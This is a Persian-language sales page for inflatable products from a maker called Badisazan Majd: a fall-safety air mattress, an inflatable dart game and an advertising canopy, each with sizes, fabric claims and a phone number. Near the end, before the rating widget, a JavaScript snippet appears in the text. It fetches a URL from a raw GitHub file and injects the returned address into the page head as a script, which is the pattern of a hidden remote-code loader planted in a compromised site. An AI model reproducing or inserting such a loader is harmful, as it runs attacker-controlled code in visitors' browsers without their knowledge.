دستگاه های بادی تفریحی – تبلیغاتی
دستگاه های بادی تفریحی - تبلیغاتی

دستگاه های بادی تفریحی – تبلیغاتی

  • این دستگاه های بادی تفریحی – تبلیغاتی محدویت خاصی ندارد معمولا در پارک ها و شهر بازی و سالن های وزرشی استفاده می شود. و در کنار آن می توان تبلیغات استفاده کرد.

    تشک بادی ایمنی سقوط آزاد

    ابعاد و اندازه وزن این تشک 200 کیلوگرم، طول 9 متر و عرض 9 آن  متر می باشد. همچنین ارتفاع آن  2.5 متر است.جنس پارچه و دوخت پارچه این تشک بادی از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این تشک با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است. نحوه خرید تشک بادی ایمنی سقوط آزاد برای خرید تشک می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    شوت دارت، یک دستگاه های بادی تفریحی

    ابعاد و اندازه و وزن این دستگاه 35 کیلوگرم، عرض آن 3  متر می باشد. همچنین ارتفاع آن 3 متر است. جنس پارچه و دوخت پارچه این دارت بادی از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این تشک با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است. نحوه خرید شوت دارت بادی تفریحی می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید. برای اطلاعات بیشتر به این پست مراجعه فرمایید. 

    سایه بان بادی تبلیغاتی

    سایه بان بادی تبلیغاتی KM-132 یک سازه فرهنگی تبلیغاتی از تولیدی بادی سازان مجد است. شما می توانید با خرید این محصول از خدمات پس از فروش آن نیز بهره مند شوید. ابعاد و اندازه وزن این دستگاه چیزی حدود 35 کیلوگرم است. همچنین طول این سازه 5 متر به همراه عرض 2.5 متر می باشد. ارتفاع این سازه نیز 5 متر می باشد. این سازه مناسب تبلیغات در نمایشگاه ها، فروشگاه ها، و مکان های تبلیغاتی است. همچنین شما می توانید دیگر محصولات تبلیغاتی خود را مطابق سلیقه خود سفارش دهید. برای سفارش و خرید می توانید با شماره تلفن 09127484573 تماس حاصل نمایید. برای اطلاعات بیشتر به این پست مراجعه فرمایید. 

    نحوه خرید دستگاه های بادی تفریحی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید. قبلا ما به این دو محصول دیگر اشاره کرده بودیم.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید